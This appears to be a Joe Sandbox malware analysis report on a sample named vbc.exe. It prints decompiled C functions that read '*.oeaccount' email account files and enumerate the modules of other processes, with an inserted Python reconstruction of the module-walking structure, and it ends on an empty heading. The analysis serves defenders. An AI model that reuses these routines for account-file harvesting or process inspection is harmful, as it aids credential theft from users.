                                                                                                                                                    • Instruction ID: 7e171057c748ab9e8bd63aa8a265ef6dac548e8f33c4ed25ddb9a168741e2a8b
                                                                                                                                                    • Opcode Fuzzy Hash: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
                                                                                                                                                    • Instruction Fuzzy Hash: B221ABF294411C6EDB11DB55DC85FDA77ACAB54308F4004BBE609E2081EA789BC48B69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			// Decompiled by the Joe Sandbox IDA plugin; builds a double-NUL-terminated list of
                                                                                                                                                    			// "name (value)" / "value" string pairs from an array of _a8 (name, value) pointer pairs at _a4.
                                                                                                                                                    			E0040684D(char* __ebx, intOrPtr _a4, int _a8) {
                                                                                                                                                    				char _v8;      // remaining pair count
                                                                                                                                                    				void _v1031;
                                                                                                                                                    				void _v1032;   // 0x400-byte scratch buffer for sprintf
                                                                                                                                                    				char* _t18;    // declaration missing from the decompiler output
                                                                                                                                                    				void* _t26;
                                                                                                                                                    				char* _t27;
                                                                                                                                                    				int _t32;
                                                                                                                                                    				int _t38;
                                                                                                                                                    				char* _t43;
                                                                                                                                                    				int _t44;      // write offset into the output buffer (__ebx)
                                                                                                                                                    				void* _t45;
                                                                                                                                                    				void** _t48;   // cursor over the (name, value) pointer pairs
                                                                                                                                                    				void* _t50;
                                                                                                                                                    				void* _t51;
                                                                                                                                                    
                                                                                                                                                    				_t43 = __ebx;
                                                                                                                                                    				_t44 = 0;
                                                                                                                                                    				_v1032 = 0;
                                                                                                                                                    				memset( &_v1031, 0, 0x3ff);
                                                                                                                                                    				_t26 = _a8;
                                                                                                                                                    				_t51 = _t50 + 0xc;
                                                                                                                                                    				 *__ebx = 0;
                                                                                                                                                    				if(_t26 > 0) {
                                                                                                                                                    					_t48 = _a4 + 4;
                                                                                                                                                    					_v8 = _t26;
                                                                                                                                                    					do {
                                                                                                                                                    						sprintf( &_v1032, "%s (%s)",  *((intOrPtr*)(_t48 - 4)),  *_t48); // "name (value)"
                                                                                                                                                    						_t32 = strlen( &_v1032);
                                                                                                                                                    						_a8 = _t32;
                                                                                                                                                    						memcpy(_t44 + __ebx,  &_v1032, _t32 + 1); // copy including the terminating NUL
                                                                                                                                                    						_t45 = _t44 + _a8 + 1;
                                                                                                                                                    						_t38 = strlen( *_t48);
                                                                                                                                                    						_a8 = _t38;
                                                                                                                                                    						memcpy(_t45 + __ebx,  *_t48, _t38 + 1);   // then the bare value, NUL-terminated
                                                                                                                                                    						_t51 = _t51 + 0x30;
                                                                                                                                                    						_t48 =  &(_t48[2]); // advance to the next (name, value) pair
                                                                                                                                                    						_t18 =  &_v8;
                                                                                                                                                    						 *_t18 = _v8 - 1;
                                                                                                                                                    						_t44 = _t45 + _a8 + 1;
                                                                                                                                                    					} while ( *_t18 != 0);
                                                                                                                                                    				}
                                                                                                                                                    				_t27 = _t44 + _t43;
                                                                                                                                                    				 *_t27 = 0;                      // double NUL marks the end of the list
                                                                                                                                                    				 *((char*)(_t27 + 1)) = 0;
                                                                                                                                                    				return _t43;
                                                                                                                                                    			}
                                                                                                                                                    
                                                                                                                                                    Listing addresses (per-statement address column of the C-code listing above, spilled out of the table): 0x0040684d through 0x004068ff

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                    • String ID: %s (%s)
                                                                                                                                                    • API String ID: 3756086014-1363028141
                                                                                                                                                    • Opcode ID: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
                                                                                                                                                    • Instruction ID: 70c58cdfc2d4abbd805528426562f63df61edbbac87544aa2a0c8fc412f19922
                                                                                                                                                    • Opcode Fuzzy Hash: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
                                                                                                                                                    • Instruction Fuzzy Hash: 371193B2800158BFDF21DF58CC44BD9BBEDEF41308F00856AEA49EB112D674EA55CB98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 25%
                                                                                                                                                    			E0040E906(void* __ebx, int _a4, void* _a8) {
                                                                                                                                                    				char _v20;
                                                                                                                                                    				char _v36;
                                                                                                                                                    				char _v52;
                                                                                                                                                    				void* _t15;
                                                                                                                                                    				void* _t17;
                                                                                                                                                    				void* _t28;
                                                                                                                                                    				intOrPtr* _t31;
                                                                                                                                                    				int _t32;
                                                                                                                                                    
                                                                                                                                                    				_t28 = __ebx;
                                                                                                                                                    				_t31 = __imp__UuidFromStringA;
                                                                                                                                                    				_t15 =  *_t31("5e7e8100-9138-11d1-945a-00c04fc308ff",  &_v36);
                                                                                                                                                    				_t17 =  *_t31("00000000-0000-0000-0000-000000000000",  &_v20);
                                                                                                                                                    				if(_t15 != 0 || _t17 != 0 || E0040E8CA( &_v52, _a4,  &_v36,  &_v20, _a8,  &_a4,  &_a8) != 0) {
                                                                                                                                                    					return 0;
                                                                                                                                                    				} else {
                                                                                                                                                    					_t32 = _a4;
                                                                                                                                                    					if(_t32 > 0x7e) {
                                                                                                                                                    						_t32 = 0x7e;
                                                                                                                                                    					}
                                                                                                                                                    					memcpy(_t28, _a8, _t32);
                                                                                                                                                    					 *((char*)(_t28 + _t32)) = 0;
                                                                                                                                                    					__imp__CoTaskMemFree(_a8);
                                                                                                                                                    					return 1;
                                                                                                                                                    				}
                                                                                                                                                    			}


                                                                                                                                                    APIs
                                                                                                                                                    • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
                                                                                                                                                    • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
                                                                                                                                                    • memcpy.MSVCRT ref: 0040E966
                                                                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 0040E975
                                                                                                                                                    Strings
                                                                                                                                                    • 00000000-0000-0000-0000-000000000000, xrefs: 0040E925
                                                                                                                                                    • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 0040E918
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                    • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                    • API String ID: 1640410171-3316789007
                                                                                                                                                    • Opcode ID: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
                                                                                                                                                    • Instruction ID: cd3b670b1268c91d98ef63b10095ff511f923cb8a4afa2e2ee491a09b7572d99
                                                                                                                                                    • Opcode Fuzzy Hash: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
                                                                                                                                                    • Instruction Fuzzy Hash: AD01ADB350011CBADF01ABA6CD40DEB7BACAF08354F004833FD45E6150E634EA198BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                    			E00410BC7(void* __eflags, intOrPtr _a4, void* _a8) {
                                                                                                                                                    				void* _t12;
                                                                                                                                                    				void* _t15;
                                                                                                                                                    				char* _t19;
                                                                                                                                                    				void* _t25;
                                                                                                                                                    				void* _t28;
                                                                                                                                                    				long _t31;
                                                                                                                                                    				long _t3;   /* declared here: used below but missing from the decompiler output */
                                                                                                                                                    				long _t5;   /* declared here: used below but missing from the decompiler output */
                                                                                                                                                    				long _t37;  /* declared here: used below but missing from the decompiler output */
                                                                                                                                                    
                                                                                                                                                    				_t12 = E00405ECB(_a8);
                                                                                                                                                    				_a8 = _t12;
                                                                                                                                                    				if(_t12 != 0xffffffff) {
                                                                                                                                                    					_t31 = GetFileSize(_t12, 0);
                                                                                                                                                    					_t37 = _t31 - 2;
                                                                                                                                                    					if(_t31 > 2) {
                                                                                                                                                    						_t3 = _t31 + 2; // 0x2
                                                                                                                                                    						_t15 = _t3;
                                                                                                                                                    						L004115D0();
                                                                                                                                                    						_t25 = _t15;
                                                                                                                                                    						_t28 = _t15;
                                                                                                                                                    						SetFilePointer(_a8, 2, 0, 0);
                                                                                                                                                    						_t5 = _t31 - 2; // -2
                                                                                                                                                    						E004066F6(_t25, _a8, _t28, _t5);
                                                                                                                                                    						_t19 = _t28 + _t31;
                                                                                                                                                    						 *((char*)(_t19 - 2)) = 0;
                                                                                                                                                    						 *((char*)(_t19 - 1)) = 0;
                                                                                                                                                    						 *_t19 = 0;
                                                                                                                                                    						E00410A8A(_t25, _t37, _a4, _t28);
                                                                                                                                                    						_push(_t28);
                                                                                                                                                    						L004115D6();
                                                                                                                                                    					}
                                                                                                                                                    					return CloseHandle(_a8);
                                                                                                                                                    				}
                                                                                                                                                    				return _t12;
                                                                                                                                                    			}


                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00405ECB: CreateFileA.KERNEL32(00410C96,80000000,00000001,00000000,00000003,00000000,00000000,00410BD2,?,rA,00410C96,?,?,*.oeaccount,rA,?), ref: 00405EDD
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,rA,00410C96,?,?,*.oeaccount,rA,?,00000104), ref: 00410BE1
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00410BF3
                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 00410C02
                                                                                                                                                      • Part of subcall function 004066F6: ReadFile.KERNEL32(00000000,?,00410C15,00000000,00000000,?,?,00410C15,?,00000000), ref: 0040670D
                                                                                                                                                      • Part of subcall function 00410A8A: wcslen.MSVCRT ref: 00410A9D
                                                                                                                                                      • Part of subcall function 00410A8A: ??2@YAPAXI@Z.MSVCRT ref: 00410AA6
                                                                                                                                                      • Part of subcall function 00410A8A: WideCharToMultiByte.KERNEL32(00000000,00000000,00410C2C,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,00410C2C,?,00000000), ref: 00410ABF
                                                                                                                                                      • Part of subcall function 00410A8A: strlen.MSVCRT ref: 00410B02
                                                                                                                                                      • Part of subcall function 00410A8A: memcpy.MSVCRT ref: 00410B1C
                                                                                                                                                      • Part of subcall function 00410A8A: ??3@YAXPAX@Z.MSVCRT ref: 00410BAF
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00410C2D
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00410C37
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                    • String ID: rA
                                                                                                                                                    • API String ID: 1886237854-474049127
                                                                                                                                                    • Opcode ID: 8653955e969841bc6e3a3e35dce332f3a7803eb0c6ec2ee91436e81d7ec50ab4
                                                                                                                                                    • Instruction ID: e5b0438d6bc675850ae5605026c1b4582ede65e06839efbb6018c27a8e90e269
                                                                                                                                                    • Opcode Fuzzy Hash: 8653955e969841bc6e3a3e35dce332f3a7803eb0c6ec2ee91436e81d7ec50ab4
                                                                                                                                                    • Instruction Fuzzy Hash: 4E01B532400248BEDB206B75EC4ECDB7B6CEF55364B10812BF91486261EA758D54CB68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00409E32(void* __eax, void* __ecx, intOrPtr* __edi, void* __esi) {
                                                                                                                                                    
                                                                                                                                                    				 *__edi =  *__edi + __ecx;
                                                                                                                                                    			}
Addresses: 0x00409e38

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040A00B: SendMessageA.USER32 ref: 0040A026
                                                                                                                                                      • Part of subcall function 0040A00B: SendMessageA.USER32 ref: 0040A040
                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
                                                                                                                                                    • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
                                                                                                                                                    • LoadIconA.USER32(000000CE), ref: 00409E7D
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
                                                                                                                                                    • LoadIconA.USER32(000000CF), ref: 00409E9B
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
                                                                                                                                                    • SendMessageA.USER32 ref: 00409EBB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3673709545-0
                                                                                                                                                    • Opcode ID: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
                                                                                                                                                    • Instruction ID: 438777344fc2c20ac6f2013a54106063ce42bca0c095daa55fabf7fed0819ee6
                                                                                                                                                    • Opcode Fuzzy Hash: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
                                                                                                                                                    • Instruction Fuzzy Hash: 4E013C71280304BFFA325B60EE4BFD67AA6EB48B01F004425F349A90E1C7F56C61DA18
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00409E33(void* __eax, void* __ecx, intOrPtr* __edi) {
                                                                                                                                                    
                                                                                                                                                    				 *__edi =  *__edi + __ecx;
                                                                                                                                                    			}
Addresses: 0x00409e38

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040A00B: SendMessageA.USER32 ref: 0040A026
                                                                                                                                                      • Part of subcall function 0040A00B: SendMessageA.USER32 ref: 0040A040
                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
                                                                                                                                                    • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
                                                                                                                                                    • LoadIconA.USER32(000000CE), ref: 00409E7D
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
                                                                                                                                                    • LoadIconA.USER32(000000CF), ref: 00409E9B
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
                                                                                                                                                    • SendMessageA.USER32 ref: 00409EBB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3673709545-0
                                                                                                                                                    • Opcode ID: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
                                                                                                                                                    • Instruction ID: f483db5831cad9889e7f207d848437a4a82f195d6e7bb7359e2425aa16285a4b
                                                                                                                                                    • Opcode Fuzzy Hash: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
                                                                                                                                                    • Instruction Fuzzy Hash: 98011971281304BFFA321B60EE47FD97BA6EB48B00F014425F749A90E2CBF16860DA18
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                    			E00407D0A(void* __eflags, struct HWND__* _a4) {
                                                                                                                                                    				void _v4103;
                                                                                                                                                    				char _v4104;
                                                                                                                                                    				void* _t8;
                                                                                                                                                    				void* _t17;
                                                                                                                                                    
                                                                                                                                                    				_t8 = E004118A0(0x1004, _t17);
                                                                                                                                                    				_t21 =  *0x4171b8;
                                                                                                                                                    				if( *0x4171b8 != 0) {
                                                                                                                                                    					_v4104 = 0;
                                                                                                                                                    					memset( &_v4103, 0, 0x1000);
                                                                                                                                                    					sprintf(0x4172c0, "dialog_%d",  *0x417300);
                                                                                                                                                    					if(E00407DE5(_t17, _t21, "caption",  &_v4104) != 0) {
                                                                                                                                                    						SetWindowTextA(_a4,  &_v4104);
                                                                                                                                                    					}
                                                                                                                                                    					return EnumChildWindows(_a4, E00407CAD, 0);
                                                                                                                                                    				}
                                                                                                                                                    				return _t8;
                                                                                                                                                    			}
Addresses: 0x00407d12 0x00407d17 0x00407d1e 0x00407d2e 0x00407d35 0x00407d4a 0x00407d65 0x00407d71 0x00407d71 0x00000000 0x00407d81 0x00407d88

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 00407D35
                                                                                                                                                    • sprintf.MSVCRT ref: 00407D4A
                                                                                                                                                      • Part of subcall function 00407DE5: memset.MSVCRT ref: 00407E09
                                                                                                                                                      • Part of subcall function 00407DE5: GetPrivateProfileStringA.KERNEL32(004172C0,0000000A,00412466,?,00001000,004171B8), ref: 00407E2B
                                                                                                                                                      • Part of subcall function 00407DE5: strcpy.MSVCRT(?,?), ref: 00407E45
                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00407D71
                                                                                                                                                    • EnumChildWindows.USER32 ref: 00407D81
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindowssprintfstrcpy
                                                                                                                                                    • String ID: caption$dialog_%d
                                                                                                                                                    • API String ID: 246480800-4161923789
                                                                                                                                                    • Opcode ID: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
                                                                                                                                                    • Instruction ID: 1b9ef3c80e7b29f71c03deb4ce56ff4662aaf0b85baafec8cd622ba642293ebf
                                                                                                                                                    • Opcode Fuzzy Hash: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
                                                                                                                                                    • Instruction Fuzzy Hash: 40F02B305482887EEB12AB91DC06FE83B685F08786F0040B6BB44E11E0D7F85AC0C71E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

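The listing of E0040E255 that follows only shows anonymous stack locals (_v1132, _v1104, _v844 and so on) and three unresolved indirect calls through 0x416fe0, 0x416fd8 and 0x416fd4. The example below is added here and is not code from the Joe Sandbox report or from the sample; it reconstructs the structure those locals alias and the 0x118-byte record the loop hands to E0040E45F. One assumption is inferred from the listing rather than stated by the report: a structure whose dwSize field is set to 0x224 (548 bytes) before the call, with 8 (TH32CS_SNAPMODULE) as the first argument of the first call, is the pattern of CreateToolhelp32Snapshot / Module32First / Module32Next over a 32-bit MODULEENTRY32. The local names, the 0x224 and 0x118 sizes and the record offsets are taken from the listing; the module buffer and path below are constructed test data, and nothing here calls the Windows API.

```python
"""Map the _vN stack locals of E0040E255 onto MODULEENTRY32 fields and rebuild
the 0x118-byte per-module record the loop produces.  Added example, not code
from the report or the sample.  The Toolhelp identification is an inference
from dwSize = 0x224 and the TH32CS_SNAPMODULE (8) argument."""
import struct

# 32-bit MODULEENTRY32 as (field, byte size).  szModule is MAX_MODULE_NAME32 + 1
# = 256 bytes, szExePath is MAX_PATH = 260 bytes; 8 * 4 + 256 + 260 = 0x224.
MODULEENTRY32_FIELDS = [
    ("dwSize", 4), ("th32ModuleID", 4), ("th32ProcessID", 4),
    ("GlblcntUsage", 4), ("ProccntUsage", 4), ("modBaseAddr", 4),
    ("modBaseSize", 4), ("hModule", 4), ("szModule", 256), ("szExePath", 260),
]
MODULEENTRY32_FMT = "<8I256s260s"
MODULEENTRY32_SIZE = struct.calcsize(MODULEENTRY32_FMT)   # 0x224, as in the listing


def field_offsets():
    """Return {field: (offset, size)} for the structure above."""
    out, cur = {}, 0
    for name, size in MODULEENTRY32_FIELDS:
        out[name] = (cur, size)
        cur += size
    return out


def local_to_field(local, base_local="_v1132"):
    """Resolve a decompiler local such as '_v1104' to the field it aliases.
    _vN is ebp-N and _v1132 is where dwSize = 0x224 is stored, so the byte
    offset of _vN inside the structure is 1132 - N."""
    off = int(base_local[2:]) - int(local[2:])
    for name, (start, size) in field_offsets().items():
        if start <= off < start + size:
            return name, off - start
    raise ValueError(f"{local} lies outside the structure")


def build_moduleentry32(pid, base, size, hmodule, module, exe_path):
    """Constructed MODULEENTRY32 laid out as Module32First/Next would fill it."""
    return struct.pack(MODULEENTRY32_FMT, MODULEENTRY32_SIZE, 1, pid, 1, 1,
                       base, size, hmodule, module.encode(), exe_path.encode())


def parse_moduleentry32(buf):
    vals = struct.unpack(MODULEENTRY32_FMT, buf)
    rec = dict(zip((n for n, _ in MODULEENTRY32_FIELDS), vals))
    for key in ("szModule", "szExePath"):
        rec[key] = rec[key].split(b"\0", 1)[0].decode()
    return rec


# The record E0040E255 builds for E0040E45F, read straight off the listing:
#   memset(&_v316, 0, 0x118)   -> record base, 0x118 bytes
#   _v316 = _t94 (pid)         -> +0x000
#   _v312 = _v1104             -> +0x004  hModule
#   strcpy(&_v308, &_v844)     -> +0x008  szExePath, room up to +0x110
#   _v44  = _v1108             -> +0x110  modBaseSize
#   _v40  = _v1112             -> +0x114  modBaseAddr
RECORD_FMT = "<II264sII"
RECORD_SIZE = struct.calcsize(RECORD_FMT)   # 0x118


def build_record(pid, entry_buf):
    """What one iteration of the loop body leaves in the record."""
    e = parse_moduleentry32(entry_buf)
    return struct.pack(RECORD_FMT, pid, e["hModule"], e["szExePath"].encode(),
                       e["modBaseSize"], e["modBaseAddr"])


def parse_record(buf):
    pid, hmod, path, size, base = struct.unpack(RECORD_FMT, buf)
    return {"pid": pid, "hModule": hmod,
            "path": path.split(b"\0", 1)[0].decode(),
            "modBaseSize": size, "modBaseAddr": base}


if __name__ == "__main__":
    for loc in ("_v1132", "_v1112", "_v1108", "_v1104", "_v844"):
        print(loc, "->", local_to_field(loc))
    # constructed sample entry; the path is made up for the example
    me = build_moduleentry32(0x1234, 0x400000, 0x18000, 0x400000,
                             "vbc.exe", "C:\\constructed\\vbc.exe")
    print(parse_record(build_record(0x1234, me)))
```

Resolving the locals this way is what turns the listing readable: _v1104, _v1108 and _v1112 are hModule, modBaseSize and modBaseAddr, and the strcpy from _v844 copies szExePath, so the function walks every module of the target process and passes (pid, hModule, path, size, base) to the E0040E45F callback; the 0x224 written back into _v1132 before each Module32Next is the dwSize refresh the Toolhelp API requires.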
                                                                                                                                                    C-Code - Quality: 35%
                                                                                                                                                    			E0040E255(void* __ecx, void* __eflags, long _a4, intOrPtr _a8) {
                                                                                                                                                    				void* _v8;
                                                                                                                                                    				signed int _v12;
                                                                                                                                                    				unsigned int _v16;
                                                                                                                                                    				int _v20;
                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                    				char _v32;
                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                    				char _v308;
                                                                                                                                                    				intOrPtr _v312;
                                                                                                                                                    				void _v316;
                                                                                                                                                    				void _v579;
                                                                                                                                                    				char _v580;
                                                                                                                                                    				char _v844;
                                                                                                                                                    				intOrPtr _v1104;
                                                                                                                                                    				intOrPtr _v1108;
                                                                                                                                                    				intOrPtr _v1112;
                                                                                                                                                    				char _v1132;
                                                                                                                                                    				char _v17516;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				void* _t63;
                                                                                                                                                    				void* _t64;
                                                                                                                                                    				void* _t77;
                                                                                                                                                    				intOrPtr _t84;
                                                                                                                                                    				void _t94;
                                                                                                                                                    				int _t102;
                                                                                                                                                    				void* _t106;
                                                                                                                                                    				void* _t107;
                                                                                                                                                    
                                                                                                                                                    				E004118A0(0x446c, __ecx);
                                                                                                                                                    				_t102 = 0;
                                                                                                                                                    				_v20 = 0;
                                                                                                                                                    				if(E0040629C() == 0 ||  *0x417518 == 0) {
                                                                                                                                                    					if( *0x417514 != _t102) {
                                                                                                                                                    						_t94 = _a4;
                                                                                                                                                    						_t63 =  *0x416fe0(8, _t94);
                                                                                                                                                    						_v8 = _t63;
                                                                                                                                                    						if(_t63 != 0xffffffff) {
                                                                                                                                                    							_v20 = 1;
                                                                                                                                                    							_v1132 = 0x224;
                                                                                                                                                    							_t64 =  *0x416fd8(_t63,  &_v1132);
                                                                                                                                                    							while(_t64 != 0) {
                                                                                                                                                    								memset( &_v316, _t102, 0x118);
                                                                                                                                                    								_v312 = _v1104;
                                                                                                                                                    								_v316 = _t94;
                                                                                                                                                    								strcpy( &_v308,  &_v844);
                                                                                                                                                    								_v44 = _v1108;
                                                                                                                                                    								_t107 = _t107 + 0x14;
                                                                                                                                                    								_v40 = _v1112;
                                                                                                                                                    								_v1132 = 0x224;
                                                                                                                                                    								if(E0040E45F(_a8,  &_v316) != 0) {
                                                                                                                                                    									_t64 =  *0x416fd4(_v8,  &_v1132);
                                                                                                                                                    									continue;
                                                                                                                                                    								}
                                                                                                                                                    								goto L18;
                                                                                                                                                    							}
                                                                                                                                                    							goto L18;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    				} else {
                                                                                                                                                    					_t77 = OpenProcess(0x410, 0, _a4);
                                                                                                                                                    					_v8 = _t77;
                                                                                                                                                    					if(_t77 != 0) {
                                                                                                                                                    						_push( &_v16);
                                                                                                                                                    						_push(0x4000);
                                                                                                                                                    						_push( &_v17516);
                                                                                                                                                    						_push(_t77);
                                                                                                                                                    						if( *0x416fe4() != 0) {
                                                                                                                                                    							_t6 =  &_v16;
                                                                                                                                                    							 *_t6 = _v16 >> 2;
                                                                                                                                                    							_v20 = 1;
                                                                                                                                                    							_v12 = 0;
                                                                                                                                                    							if( *_t6 != 0) {
                                                                                                                                                    								while(1) {
                                                                                                                                                    									_v580 = 0;
                                                                                                                                                    									memset( &_v579, _t102, 0x104);
                                                                                                                                                    									memset( &_v316, _t102, 0x118);
                                                                                                                                                    									_t84 =  *((intOrPtr*)(_t106 + _v12 * 4 - 0x4468));
                                                                                                                                                    									_t107 = _t107 + 0x18;
                                                                                                                                                    									_v316 = _a4;
                                                                                                                                                    									_v312 = _t84;
                                                                                                                                                    									 *0x416fdc(_v8, _t84,  &_v580, 0x104);
                                                                                                                                                    									E0040E172( &_v308,  &_v580);
                                                                                                                                                    									_push(0xc);
                                                                                                                                                    									_push( &_v32);
                                                                                                                                                    									_push(_v312);
                                                                                                                                                    									_push(_v8);
                                                                                                                                                    									if( *0x416fe8() != 0) {
                                                                                                                                                    										_v44 = _v28;
                                                                                                                                                    										_v40 = _v32;
                                                                                                                                                    									}
                                                                                                                                                    									if(E0040E45F(_a8,  &_v316) == 0) {
                                                                                                                                                    										goto L18;
                                                                                                                                                    									}
                                                                                                                                                    									_v12 = _v12 + 1;
                                                                                                                                                    									if(_v12 < _v16) {
                                                                                                                                                    										_t102 = 0;
                                                                                                                                                    										continue;
                                                                                                                                                    									} else {
                                                                                                                                                    									}
                                                                                                                                                    									goto L18;
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						L18:
                                                                                                                                                    						CloseHandle(_v8);
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				return _v20;
                                                                                                                                                    			}

                                                                                                                                                    Instruction addresses (decompiler listing column, in order):
